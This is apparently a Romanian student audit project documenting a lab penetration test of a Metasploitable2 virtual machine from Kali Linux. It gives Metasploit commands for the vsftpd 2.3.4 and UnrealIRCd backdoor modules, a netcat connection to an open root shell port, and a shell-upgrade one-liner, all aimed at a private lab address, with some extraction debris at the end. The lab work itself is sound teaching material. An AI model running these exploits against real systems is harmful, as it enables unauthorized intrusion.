Sunteți pe pagina 1din 19

UNIVERSITATEA 

DE VEST DIN TIMIȘOARA
FACULTATEA DE ECONOMIE ȘI DE ADMINISTRARE A AFACERILOR
MASTER AUDIT FINANCIAR CONTABIL

https://www.hackingarticles.in/ssh-penetration-testing-port-22/

PROIECT

Penetrara unui server utlizand tool-ul Metasploitable2 

Nume student
Barbulet Ioana
Fumor Ioana
Master : SIA

Timișoara, 2020

Raport cu privire la auditul sistemului informațional

-CUPRINS-

1. Prezentarea sistemului informațional …………………………………..……………................................3

1.1. Kali Linux................................................................................................................................. 3


1.2. Metasploit tool in Kali Linux……............................................................................................... 3

2. Obiectivele misiunii de audit SI .................................................................................. 4
3. Analiza sistemului ................................................................. ……………………………………...4

3.1. Selecția metodei de analiză a riscurilor ............................................................................4
3.2. Procedura de exploatare a vulnerabilități………………………………………….............................5
3.3. Exploataea și post-exploatare………………………………………..................................................5

4. Oganzarea unui test de penetrare ....................................................................................... 6

4.1. Configurarea Kali linux în mediul virtual………………………………………………..........................6


4.2. Bazele Metasploi................................................................................................................6

5. Atac Metasploit folosind KaliLinux…………………………........................................................................... 6


6. Bibliografie………………….......................................................................................................................15

1. Prezentarea a sistemului informațional

1.1.  KALI LINUX

Kali Linux este un proiect open source care este întreținut și finanțat de  Offensive Security ,
un furnizor de servicii de pregătire în domeniul securității informațiilor de nivel mondial și servicii
de testare a penetrării. 

Servicii oferite:
Kali Linux vine cu peste 600 de unelte preinstalate de securitate și de testare a
vulnerabilității sistemului.
 Aircrack-ng
 Armitage
 Binwalk
 Burp suite
 Cisco Global Exploiter
 Ettercap
 Foremost
 Hydra
 John the Ripper
 Kismet
 Maltego
 Metasploit
 Nmap
 OWASP ZAP
 Programe pentru Inginerie socială și Inginerie inversă
 Sqlmap
 Volatility (software)
 Wireshark

1.2. Metasploit tool in Kali Linux

Metasploit este un proiect de securitate computerizat care oferă informații


despre vulnerabilitățile de securitate și ajută la testarea penetrării și dezvoltarea semnăturilor
IDS . 
Cel mai cunoscut sub-proiect al său este open-source [2] Metasploit Framework , un
instrument pentru dezvoltarea și executarea codului de exploatare împotriva unei mașini țintă la
distanță. Alte sub-proiecte importante includ baza de date Opcode, arhiva de coduri shell și
cercetarea aferentă.
Proiectul Metasploit include instrumente anti-criminalistice și de evaziune, unele dintre ele
fiind încorporate în Cadrul Metasploit. Metasploit este preinstalat în sistemul de operare Kali
Linux . [3] Metasploit poate fi, de asemenea, rulat pe termux în Android, iar utilizatorul poate
înțelege metasploit care lucrează cu Android.

Contine modulele:
 Comanda shell permite utilizatorilor să ruleze scripturi de colecție sau să ruleze
comenzi arbitrare împotriva gazdei.
 Meterpreter permite utilizatorilor să controleze ecranul unui dispozitiv folosind VNC și
să răsfoiască, să încarce și să descarce fișiere.
 Încărcările utile dinamice permit utilizatorilor să se sustragă împotriva apărării anti-
virus, generând sarcini utile unice.
 Sarcinile statice permit adresarea IP statică / redirecționarea porturilor pentru
comunicarea dintre gazdă și sistemul client.

Utilizarea Metasploit în Kali Linux

Kali Linux este cel mai popular sistem de operarepentru profesioniștii din securitate din două
motive. În primul rând, are toate instrumentele populare de testare a penetrării preinstalate în ea,
astfel încât se reducecostul unei instalații separate. În al doilea rând, este un sistem de operare bazat
pe Linux, care îl face mai puțin predispus la atacuri de virus și oferă mai multă stabilitate în timpul
testării de penetrare. Nu trebuie să instalate componente și instrumente relevante și cine știe când
puteți întâmpina o eroare necunoscută în timpul procesului de instalare.

2. Obiectivele misiunii de audit SI
Vulnerabilități:
Vom folosi 3 vulnerabilitati pentru atac in 3 moduri:

1. serviciul ftp port 21 - vsftpd 2.3.4


2. serviciul shell port 1524 - Metasploitable root shell
3. serviciul irc port 6667 0 UnrealIRCd

Procedura de atac
Conceptul atacului asupra VSFTPD 2.3.4  este de a declanșa vsf_sysutil_extra();funcția rău
intenționată , trimițând o secvență de octeți specifici pe portul 21, care, la o execuție reușită, are ca
rezultat deschiderea portierei posterioare pe portul 6200 al sistemului.

3. Analiza sistemului

3.1.  Selecția  metodei  de  analiză  a  riscurilor

Pentru identificarea şi evaluarea riscurilor, în general, se parcurg următorii paşi:

identificarea vulnerabilitatilor;
determinarea frecvenţei şi duratei de apariţie a fiecărui factor de risc;

3.2Procedura de exploatare a vulnerabilității

Următoarea captură de ecran a codului sursă vulnerabil va face lucrurile mult mai clare:

Putem vedea clar că dacă octeții din bufferul de rețea se potrivesc cu secvența din spatele spate de
0x3a (colon) și 0x29, funcția dăunătoare este declanșată.
3.3Exploatare și post-exploatare

După ce am acumulat suficiente cunoștințe despre vulnerabilitate, exploatăm sistemul țintă. Să


vedem ce opțiuni avem de setat înainte de a trage exploit-ul asupra țintei.
Înainte de exploatarea scanării țintă se face prin utilizarea Nmap (Network Mapping) pentru a găsi
porturile și serviciile deschise

4. Organizarea unui test de penetrare

Înainte de a începe să tragem vectori de atac sofisticate și complexe cu Metasploit, trebuie să ne


înțelegem cu mediul de lucru. Obținerea de cunoștințe despre mediul de muncă este un factor critic
care intră în joc înainte de a efectua un test de penetrare. Să înțelegem diferitele faze ale unui test de
penetrare înainte de a sări în exerciții Metasploit și să vedem cum să organizăm un test de penetrare la
scară profesională.

4.1.  Configurarea Kali Linux in mediul virtual

Înainte de a utiliza Metasploit, trebuie să avem un laborator de testare. Cu toate acestea, dacă avem o
singură mașină, cea mai bună idee este să creăm un mediu virtual.
Pentru a crea medii virtuale, avem nevoie de software pentru mașini virtuale. Putem folosi oricare
dintre două dintre cele mai populare: VirtualBox și VMware player.

4.2. Bazele Metasploit

Metasploit este un proiect de securitate care oferă exploatări și tone de caracteristici de


recunoaștere pentru a ajuta testerul de penetrare. Este în totalitate un proiect bazat pe Ruby și oferă o
mulțime de exploatări, sarcini utile, tehnici de codificare și o mulțime de funcții post-exploatare.
Din faza de colectare a informațiilor, putem vedea că există numeroase servicii care rulează pe
țintă. Informațiile gazdelor dezvăluie, de asemenea, că sistemul de operare țintă este bazat pe Linux. 

5. Atac Metasploit folosind Kali Linux

Metasploit framework - se va folosi la atacurile Metasploitable 2

Logarea se va face folosind user si parola: msfadmin


Pentru a afla IP-ul target_ului vom folosi comanda: ifconfig -a
Inainte de a ataca target-ul vom face o scanare folosind nmap pentru a gasi porturile deschise:

6
Mai sus putem vedea lista cu porturile deschise (*/tcp)

Vom folosi 3 vulnerabilitati pentru atac in 3 moduri:


1. serviciul ftp port 21 - vsftpd 2.3.4
2. serviciul shell port 1524 - Metasploitable root shell
3. serviciul irc port 6667 0 UnrealIRCd
Dupa ce am identificat vulnerabilitatile cautam explicatii pe motorul de cautare Google ( de ex .   
vsftpd 2.3.4 vulnerabilities )
De ex. Accesand link-ul
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
vom merge pana la finalul paginii si acolo vom vedea cum putem ataca portul
sau folosind comenzile :

root@kali#service postgresql start

msf > use exploit/unix/ftp/vsftpd_234_backdoor


7
4

Metoda 1 de penetrare
serviciul ftp port 21 - vsftpd 2.3.4

Incepem utilizarea Metasploit Framework cu comenzile:


root@kali#service postgresql start
root@kali#mfsconsole

8
Vom cauta payload-uri vsftpd 2.3.4 folosind comanda:
msf > search vsftpd 2.3.4
9
Urmeaza atacul propriu-zis:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.0.125 (adresa IP a victimei – remote host )

show options
Penetrarea se face folosind comanda: exploit

10

Penetrarea a fost facuta dupa cum se poate vedea in imaginea de mai sus.

Daca vrem sa obtinem cursor folosim comanda python: python -c 'import pty;
pty.spawn("/bin/bash")'

Metoda 2 de penetrare
serviciul shell port 1524 - Metasploitable root shell
Se va folosi comanda: root@kali# nc (netcat) 192.168.0.125 1524
Rezultatul:
Penetrarea a fost facuta dupa cum se poate vedea in imaginea de mai sus.

Metoda 3 de penetrare
Am penetrat serviciul irc port 6667 0 UnrealIRCd
Incepem utilizarea Metasploit Framework cu comanda: search UnrealIRCd

11
Apoi, dupa cautarea google vom da comanda:
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

Setam rhost = target


set rhost 192.168.0.125
show options

12
Dupa care se va face penetrarea propriu-zisa cu comanda: exploit

Daca vrem sa obtinem cursor pentru a continua atacul folosim comanda python: python -c 'import
pty; pty.spawn("/bin/bash")'
13
14
Bibliografie

 https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
 https://subscription.packtpub.com/book/networking_and_servers/9781786463166/1/ch01lvl1sec17
/modeling-threats
 https://www.kali.org/
 https://sourceforge.net/projects/metasploitable/

1.2.2 - SSH Service The Secure Shell (SSH)3 service is most commonly used to remotely access a
computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH
protocol has some surprising and useful features, beyond providing terminal access. The SSH service
is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following
command into a Kali terminal.
15

S-ar putea să vă placă și